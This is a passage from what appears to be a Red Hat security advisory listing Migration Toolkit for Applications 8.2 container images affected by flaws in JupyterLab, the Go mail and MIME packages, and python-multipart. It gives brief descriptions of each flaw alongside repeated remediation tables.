| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-rhel9-operator@sha256:3926f791376886972749cae0f8eb635af67a088811214066c6deb010c6b762f0_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-rhel9-operator@sha256:957a553608cbf9ed108c22f851ef809ed348cf592610851c3a554f3342ba511a_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-ui-rhel9@sha256:a77f5a731c20943958b5f654bf3147b690d5dd608b794bff261a23dd89f785f1_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-ui-rhel9@sha256:f59dcacb1eed9bcd539bc6c26a630115cf35378d77075247fb42219836e2adb7_arm64 | — |
Workaround
|
A flaw was found in JupyterLab, an extensible environment for interactive computing. The PyPI Extension Manager, responsible for installing extensions, failed to properly enforce its allow-list of approved extensions. This vulnerability allowed for the installation of unauthorized extensions from sources outside the default PyPI index. Exploitation of this flaw could lead to arbitrary code execution and significant system compromise.
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-solution-server-rhel9@sha256:21fab4b77580795980fd60b24ab1d6a3cc159a9246beccd1c19938bca94edd23_amd64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-solution-server-rhel9@sha256:f8c8651cc5fa016003ef4105f28775e0b225472d2c3135e5f37d1e1f748c515e_arm64 | — |
Vendor Fix
fix
Workaround
|
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-analyzer-addon-rhel9@sha256:1e20ac649ee7fdcdad9930b1f0384e10c8794db9a2f211d4e3d1679c0c10cc53_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-analyzer-addon-rhel9@sha256:907c0c8c40c1fb494caa5feac439b90754160bf3f79d8e76cf2dded63f549db6_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-cli-rhel9@sha256:d466bf042711b13fc53cbc561b70e4f58cd77f8a05d1d4ee10c10a6e1c201fe7_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-cli-rhel9@sha256:ecae0c1053637d609a19773757c0ea8b336b645950a42473015daabfe9677fab_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-discovery-addon-rhel9@sha256:7377a2c2f16ca436819cbbf106fc27d3a8c44c7fca0a44108ccc826bf8678ace_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-discovery-addon-rhel9@sha256:a72cbf7b2ba6420e31ecca15f7d3628a671dd642a6ccf4610c5a26462a5d4b36_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-dotnet-external-provider-rhel9@sha256:794180378ddb9a88001d76b849df305034924683a79ef145f744fe03bee9c32b_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-dotnet-external-provider-rhel9@sha256:b5d66f8d4c6d6680886e631296c927c9502817fbb823a680f1dabf1cc92e0465_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-go-external-provider-rhel9@sha256:8e5ba3659ef5f88b81c1c9d795b6af6048fd7d870493ce5f013efcb9fce90b9d_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-go-external-provider-rhel9@sha256:8f91d460985e1a97ac6892d26c0517f39871d94d1b3bfad005d58d424bed2b0b_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-hub-rhel9@sha256:0223927b9e584f302aabafdbf015a779b14c9b5816cf0baa0cb1bfe0b1cc3415_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-hub-rhel9@sha256:2e251b0343327f2ac6e60d2888da526be6a82a355310f1aea93011426cddc485_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-java-external-provider-rhel9@sha256:60c4a45085db3517f6a9bae32a4b93fd2dfa799c3e957776ad2d8ab0777507c2_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-java-external-provider-rhel9@sha256:e8bd699e851fbab4466d1d25e3a08e2bcf8997978cb7f19f509c627be42d03dd_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-nodejs-external-provider-rhel9@sha256:12883516af95bf0f6abad1556d22896f16a087c1e4191fedc1f5d689cf6d67f6_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-nodejs-external-provider-rhel9@sha256:a89c4d19ff39a406f3279b4ffd6f8d2a2a82a78ab3e9aa1dc0f2c385a24fa844_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-operator-bundle@sha256:94f88bf557a036c54b348c2689c699a720d5d347b1bba141feec273e624ccdbf_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-platform-addon-rhel9@sha256:647ca556be4338749fbe7cb18580466ce6155bfce17c96deda7b7c037fd16240_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-platform-addon-rhel9@sha256:f421044ff3d6911097aebcbabfac87ddad74987e0e5f18a96dd89454f46a4cdf_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-python-external-provider-rhel9@sha256:25618ee8a690f336e1604a1b1ca9dd5197bbdea5cd02cfaf588fbd950a8fd228_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-python-external-provider-rhel9@sha256:4f46867f5ff78e9e970bc572a1a625080ae8faea29dc098d3d7d4355e8350ca1_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-rhel9-operator@sha256:3926f791376886972749cae0f8eb635af67a088811214066c6deb010c6b762f0_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-rhel9-operator@sha256:957a553608cbf9ed108c22f851ef809ed348cf592610851c3a554f3342ba511a_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-ui-rhel9@sha256:a77f5a731c20943958b5f654bf3147b690d5dd608b794bff261a23dd89f785f1_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-ui-rhel9@sha256:f59dcacb1eed9bcd539bc6c26a630115cf35378d77075247fb42219836e2adb7_arm64 | — |
Workaround
|
A flaw was found in the `net/mail` package within the Go standard library. A remote attacker could provide specially crafted, pathological email addresses. When these malformed email addresses are parsed by the `consumePhrase` function, it can lead to excessive resource consumption due to quadratic string concatenation, resulting in a Denial of Service (DoS) condition.
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-cli-rhel9@sha256:d466bf042711b13fc53cbc561b70e4f58cd77f8a05d1d4ee10c10a6e1c201fe7_amd64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-cli-rhel9@sha256:ecae0c1053637d609a19773757c0ea8b336b645950a42473015daabfe9677fab_arm64 | — |
Vendor Fix
fix
Workaround
|
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-analyzer-addon-rhel9@sha256:1e20ac649ee7fdcdad9930b1f0384e10c8794db9a2f211d4e3d1679c0c10cc53_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-analyzer-addon-rhel9@sha256:907c0c8c40c1fb494caa5feac439b90754160bf3f79d8e76cf2dded63f549db6_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-discovery-addon-rhel9@sha256:7377a2c2f16ca436819cbbf106fc27d3a8c44c7fca0a44108ccc826bf8678ace_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-discovery-addon-rhel9@sha256:a72cbf7b2ba6420e31ecca15f7d3628a671dd642a6ccf4610c5a26462a5d4b36_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-dotnet-external-provider-rhel9@sha256:794180378ddb9a88001d76b849df305034924683a79ef145f744fe03bee9c32b_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-dotnet-external-provider-rhel9@sha256:b5d66f8d4c6d6680886e631296c927c9502817fbb823a680f1dabf1cc92e0465_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-go-external-provider-rhel9@sha256:8e5ba3659ef5f88b81c1c9d795b6af6048fd7d870493ce5f013efcb9fce90b9d_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-go-external-provider-rhel9@sha256:8f91d460985e1a97ac6892d26c0517f39871d94d1b3bfad005d58d424bed2b0b_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-hub-rhel9@sha256:0223927b9e584f302aabafdbf015a779b14c9b5816cf0baa0cb1bfe0b1cc3415_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-hub-rhel9@sha256:2e251b0343327f2ac6e60d2888da526be6a82a355310f1aea93011426cddc485_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-java-external-provider-rhel9@sha256:60c4a45085db3517f6a9bae32a4b93fd2dfa799c3e957776ad2d8ab0777507c2_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-java-external-provider-rhel9@sha256:e8bd699e851fbab4466d1d25e3a08e2bcf8997978cb7f19f509c627be42d03dd_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-nodejs-external-provider-rhel9@sha256:12883516af95bf0f6abad1556d22896f16a087c1e4191fedc1f5d689cf6d67f6_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-nodejs-external-provider-rhel9@sha256:a89c4d19ff39a406f3279b4ffd6f8d2a2a82a78ab3e9aa1dc0f2c385a24fa844_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-operator-bundle@sha256:94f88bf557a036c54b348c2689c699a720d5d347b1bba141feec273e624ccdbf_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-platform-addon-rhel9@sha256:647ca556be4338749fbe7cb18580466ce6155bfce17c96deda7b7c037fd16240_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-platform-addon-rhel9@sha256:f421044ff3d6911097aebcbabfac87ddad74987e0e5f18a96dd89454f46a4cdf_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-python-external-provider-rhel9@sha256:25618ee8a690f336e1604a1b1ca9dd5197bbdea5cd02cfaf588fbd950a8fd228_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-python-external-provider-rhel9@sha256:4f46867f5ff78e9e970bc572a1a625080ae8faea29dc098d3d7d4355e8350ca1_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-rhel9-operator@sha256:3926f791376886972749cae0f8eb635af67a088811214066c6deb010c6b762f0_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-rhel9-operator@sha256:957a553608cbf9ed108c22f851ef809ed348cf592610851c3a554f3342ba511a_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-solution-server-rhel9@sha256:21fab4b77580795980fd60b24ab1d6a3cc159a9246beccd1c19938bca94edd23_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-solution-server-rhel9@sha256:f8c8651cc5fa016003ef4105f28775e0b225472d2c3135e5f37d1e1f748c515e_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-ui-rhel9@sha256:a77f5a731c20943958b5f654bf3147b690d5dd608b794bff261a23dd89f785f1_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-ui-rhel9@sha256:f59dcacb1eed9bcd539bc6c26a630115cf35378d77075247fb42219836e2adb7_arm64 | — |
Workaround
|
A flaw was found in the Golang MIME (Multipurpose Internet Mail Extensions) package. A remote attacker could exploit this vulnerability by sending a maliciously-crafted MIME header containing many invalid encoded-words. This could lead to excessive CPU consumption, resulting in a Denial of Service (DoS) for the affected system.
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-cli-rhel9@sha256:d466bf042711b13fc53cbc561b70e4f58cd77f8a05d1d4ee10c10a6e1c201fe7_amd64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-cli-rhel9@sha256:ecae0c1053637d609a19773757c0ea8b336b645950a42473015daabfe9677fab_arm64 | — |
Vendor Fix
fix
Workaround
|
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-analyzer-addon-rhel9@sha256:1e20ac649ee7fdcdad9930b1f0384e10c8794db9a2f211d4e3d1679c0c10cc53_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-analyzer-addon-rhel9@sha256:907c0c8c40c1fb494caa5feac439b90754160bf3f79d8e76cf2dded63f549db6_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-discovery-addon-rhel9@sha256:7377a2c2f16ca436819cbbf106fc27d3a8c44c7fca0a44108ccc826bf8678ace_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-discovery-addon-rhel9@sha256:a72cbf7b2ba6420e31ecca15f7d3628a671dd642a6ccf4610c5a26462a5d4b36_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-dotnet-external-provider-rhel9@sha256:794180378ddb9a88001d76b849df305034924683a79ef145f744fe03bee9c32b_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-dotnet-external-provider-rhel9@sha256:b5d66f8d4c6d6680886e631296c927c9502817fbb823a680f1dabf1cc92e0465_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-go-external-provider-rhel9@sha256:8e5ba3659ef5f88b81c1c9d795b6af6048fd7d870493ce5f013efcb9fce90b9d_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-go-external-provider-rhel9@sha256:8f91d460985e1a97ac6892d26c0517f39871d94d1b3bfad005d58d424bed2b0b_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-hub-rhel9@sha256:0223927b9e584f302aabafdbf015a779b14c9b5816cf0baa0cb1bfe0b1cc3415_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-hub-rhel9@sha256:2e251b0343327f2ac6e60d2888da526be6a82a355310f1aea93011426cddc485_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-java-external-provider-rhel9@sha256:60c4a45085db3517f6a9bae32a4b93fd2dfa799c3e957776ad2d8ab0777507c2_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-java-external-provider-rhel9@sha256:e8bd699e851fbab4466d1d25e3a08e2bcf8997978cb7f19f509c627be42d03dd_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-nodejs-external-provider-rhel9@sha256:12883516af95bf0f6abad1556d22896f16a087c1e4191fedc1f5d689cf6d67f6_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-nodejs-external-provider-rhel9@sha256:a89c4d19ff39a406f3279b4ffd6f8d2a2a82a78ab3e9aa1dc0f2c385a24fa844_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-operator-bundle@sha256:94f88bf557a036c54b348c2689c699a720d5d347b1bba141feec273e624ccdbf_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-platform-addon-rhel9@sha256:647ca556be4338749fbe7cb18580466ce6155bfce17c96deda7b7c037fd16240_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-platform-addon-rhel9@sha256:f421044ff3d6911097aebcbabfac87ddad74987e0e5f18a96dd89454f46a4cdf_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-python-external-provider-rhel9@sha256:25618ee8a690f336e1604a1b1ca9dd5197bbdea5cd02cfaf588fbd950a8fd228_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-python-external-provider-rhel9@sha256:4f46867f5ff78e9e970bc572a1a625080ae8faea29dc098d3d7d4355e8350ca1_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-rhel9-operator@sha256:3926f791376886972749cae0f8eb635af67a088811214066c6deb010c6b762f0_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-rhel9-operator@sha256:957a553608cbf9ed108c22f851ef809ed348cf592610851c3a554f3342ba511a_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-solution-server-rhel9@sha256:21fab4b77580795980fd60b24ab1d6a3cc159a9246beccd1c19938bca94edd23_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-solution-server-rhel9@sha256:f8c8651cc5fa016003ef4105f28775e0b225472d2c3135e5f37d1e1f748c515e_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-ui-rhel9@sha256:a77f5a731c20943958b5f654bf3147b690d5dd608b794bff261a23dd89f785f1_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-ui-rhel9@sha256:f59dcacb1eed9bcd539bc6c26a630115cf35378d77075247fb42219836e2adb7_arm64 | — |
Workaround
|
A flaw was found in jupyterlab. This vulnerability allows a remote attacker to achieve arbitrary code execution by presenting a user with a specially crafted notebook containing a deceptive button in its pre-saved HTML cell output. When the user clicks this button, the CommandLinker component executes arbitrary JupyterLab commands without sufficient validation, leading to the execution of unauthorized code.
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-solution-server-rhel9@sha256:21fab4b77580795980fd60b24ab1d6a3cc159a9246beccd1c19938bca94edd23_amd64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-solution-server-rhel9@sha256:f8c8651cc5fa016003ef4105f28775e0b225472d2c3135e5f37d1e1f748c515e_arm64 | — |
Vendor Fix
fix
Workaround
|
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-analyzer-addon-rhel9@sha256:1e20ac649ee7fdcdad9930b1f0384e10c8794db9a2f211d4e3d1679c0c10cc53_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-analyzer-addon-rhel9@sha256:907c0c8c40c1fb494caa5feac439b90754160bf3f79d8e76cf2dded63f549db6_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-cli-rhel9@sha256:d466bf042711b13fc53cbc561b70e4f58cd77f8a05d1d4ee10c10a6e1c201fe7_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-cli-rhel9@sha256:ecae0c1053637d609a19773757c0ea8b336b645950a42473015daabfe9677fab_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-discovery-addon-rhel9@sha256:7377a2c2f16ca436819cbbf106fc27d3a8c44c7fca0a44108ccc826bf8678ace_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-discovery-addon-rhel9@sha256:a72cbf7b2ba6420e31ecca15f7d3628a671dd642a6ccf4610c5a26462a5d4b36_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-dotnet-external-provider-rhel9@sha256:794180378ddb9a88001d76b849df305034924683a79ef145f744fe03bee9c32b_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-dotnet-external-provider-rhel9@sha256:b5d66f8d4c6d6680886e631296c927c9502817fbb823a680f1dabf1cc92e0465_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-go-external-provider-rhel9@sha256:8e5ba3659ef5f88b81c1c9d795b6af6048fd7d870493ce5f013efcb9fce90b9d_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-go-external-provider-rhel9@sha256:8f91d460985e1a97ac6892d26c0517f39871d94d1b3bfad005d58d424bed2b0b_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-hub-rhel9@sha256:0223927b9e584f302aabafdbf015a779b14c9b5816cf0baa0cb1bfe0b1cc3415_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-hub-rhel9@sha256:2e251b0343327f2ac6e60d2888da526be6a82a355310f1aea93011426cddc485_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-java-external-provider-rhel9@sha256:60c4a45085db3517f6a9bae32a4b93fd2dfa799c3e957776ad2d8ab0777507c2_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-java-external-provider-rhel9@sha256:e8bd699e851fbab4466d1d25e3a08e2bcf8997978cb7f19f509c627be42d03dd_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-nodejs-external-provider-rhel9@sha256:12883516af95bf0f6abad1556d22896f16a087c1e4191fedc1f5d689cf6d67f6_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-nodejs-external-provider-rhel9@sha256:a89c4d19ff39a406f3279b4ffd6f8d2a2a82a78ab3e9aa1dc0f2c385a24fa844_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-operator-bundle@sha256:94f88bf557a036c54b348c2689c699a720d5d347b1bba141feec273e624ccdbf_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-platform-addon-rhel9@sha256:647ca556be4338749fbe7cb18580466ce6155bfce17c96deda7b7c037fd16240_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-platform-addon-rhel9@sha256:f421044ff3d6911097aebcbabfac87ddad74987e0e5f18a96dd89454f46a4cdf_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-python-external-provider-rhel9@sha256:25618ee8a690f336e1604a1b1ca9dd5197bbdea5cd02cfaf588fbd950a8fd228_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-python-external-provider-rhel9@sha256:4f46867f5ff78e9e970bc572a1a625080ae8faea29dc098d3d7d4355e8350ca1_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-rhel9-operator@sha256:3926f791376886972749cae0f8eb635af67a088811214066c6deb010c6b762f0_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-rhel9-operator@sha256:957a553608cbf9ed108c22f851ef809ed348cf592610851c3a554f3342ba511a_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-ui-rhel9@sha256:a77f5a731c20943958b5f654bf3147b690d5dd608b794bff261a23dd89f785f1_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-ui-rhel9@sha256:f59dcacb1eed9bcd539bc6c26a630115cf35378d77075247fb42219836e2adb7_arm64 | — |
Workaround
|
A flaw was found in python-multipart. A remote attacker can exploit this denial of service (DoS) vulnerability by sending a specially crafted request with an excessive number of part headers or a single very large header value during multipart/form-data parsing. This can lead to excessive CPU utilization, resulting in a denial of service for the affected system.
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-solution-server-rhel9@sha256:21fab4b77580795980fd60b24ab1d6a3cc159a9246beccd1c19938bca94edd23_amd64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-solution-server-rhel9@sha256:f8c8651cc5fa016003ef4105f28775e0b225472d2c3135e5f37d1e1f748c515e_arm64 | — |
Vendor Fix
fix
|
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-analyzer-addon-rhel9@sha256:1e20ac649ee7fdcdad9930b1f0384e10c8794db9a2f211d4e3d1679c0c10cc53_amd64 | — | ||
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-analyzer-addon-rhel9@sha256:907c0c8c40c1fb494caa5feac439b90754160bf3f79d8e76cf2dded63f549db6_arm64 | — | ||
